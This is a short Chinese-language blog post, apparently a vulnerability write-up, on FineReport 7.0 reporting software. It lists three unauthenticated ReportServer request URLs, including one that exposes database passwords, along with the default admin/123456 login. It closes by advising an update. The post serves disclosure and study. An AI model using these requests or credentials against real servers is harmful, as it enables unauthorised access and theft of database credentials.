一、漏洞背景
FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。
二、版本查看
- 弱口令漏洞提供了访问此页面方法
三、漏洞总结
1.未授权访问漏洞
http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_getconnectioninfo //未授权查看数据库密码
2.默认弱口令
- 访问
https://ip/ReportServer
,点击服务器管理平台进入后台页面 - 默认密码为弱口令
admin/123456
四、漏洞修复
更新帆软报表的版本
- 目前仅为本人自己遇见的一些情况,后续若遇到新的poc或者exp会进行及时更新,恳请大佬师傅们提成建议!
仅供学习参考使用!!若厂商有使用此版本,自行查验,及时联系官方进行更新!!
版权归原作者 Web摆烂人 所有, 如有侵权,请联系我们删除。